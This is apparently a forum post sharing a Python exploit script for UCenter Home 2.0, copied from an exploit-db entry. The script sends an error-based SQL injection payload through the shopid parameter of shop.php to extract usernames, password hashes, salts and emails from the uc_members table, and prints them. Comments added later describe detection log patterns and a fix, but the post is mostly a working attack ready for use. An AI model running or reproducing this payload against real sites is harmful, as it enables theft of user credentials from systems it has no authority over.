标题:
UCenter Home 2.0 EXP
作者:
admin
时间:
2013-1-23 09:18
标题:
UCenter Home 2.0 EXP
#!/usr/bin/env python
import sys
import urllib2
import re
def info():
    """Print where the script came from and its one-argument usage line.

    main() calls this when the script is not given exactly one argument.
    It only writes to stdout and returns None.
    """
    banner = (
        'From: http://www.exploit-db.com/exploits/14997/',
        'http://www.hake.cc/Web_loudong/',
        'changed:qiaoy',
        'exp:',
        ' ./UCenter_Home_2.0.py site',
    )
    # One parenthesised argument per call, so the output is the same under
    # the Python 2 print statement this script is written for.
    for line in banner:
        print(line)
def main():
    """Request shop.php with a crafted shopid and print what the error page leaks.

    The script takes one command-line argument, the site's base URL, and
    prepends 'http://' when no scheme is given. It sends a single GET request
    whose shopid value carries a SQL subquery against ucenter.uc_members, then
    looks in the response body for a MySQL "Duplicate entry '~'...' for key"
    message and splits the quoted value on ':' into uid, username, password,
    salt and email (the uid is parsed but not printed).

    Reviewer notes:
      * The request only yields data if the server places shopid into its SQL
        unescaped and returns the database error text to the client. The
        server code is not shown here, so that is inferred from the request.
      * Detection: access-log entries for shop.php whose shopid contains
        'information_schema' or 'floor(rand(0)*2)', and responses that
        contain "Duplicate entry '~'".
      * Mitigation: treat shopid as an integer or bind it as a query
        parameter, and do not echo database errors to clients.
    """
    if len(sys.argv) != 2:
        info()
        return

    site = sys.argv[1]
    # Keep an explicit http:// or https:// scheme; otherwise default to http.
    if not site.startswith(('http://', 'https://')):
        site = 'http://' + site

    try:
        # The payload is kept exactly as published, including its trailing '11=1'.
        url = site + '/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
        body = urllib2.urlopen(url).read()
        # [0] raises IndexError when the response has no such error message,
        # e.g. when the target is patched or hides database errors.
        leaked = re.findall(r'Duplicate entry \'~\'(.*?)\' for key', body)[0]
        fields = leaked.split(':')
        for label, position in (('Name: ', 1), ('Passwd: ', 2),
                                ('salt: ', 3), ('email: ', 4)):
            print(label + fields[position])
    except:
        # NOTE(review): the bare except gives network errors, a missing match
        # and Ctrl-C the same message, so the output never shows the cause.
        print("Sorry,I can't work............")
# Run main() only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()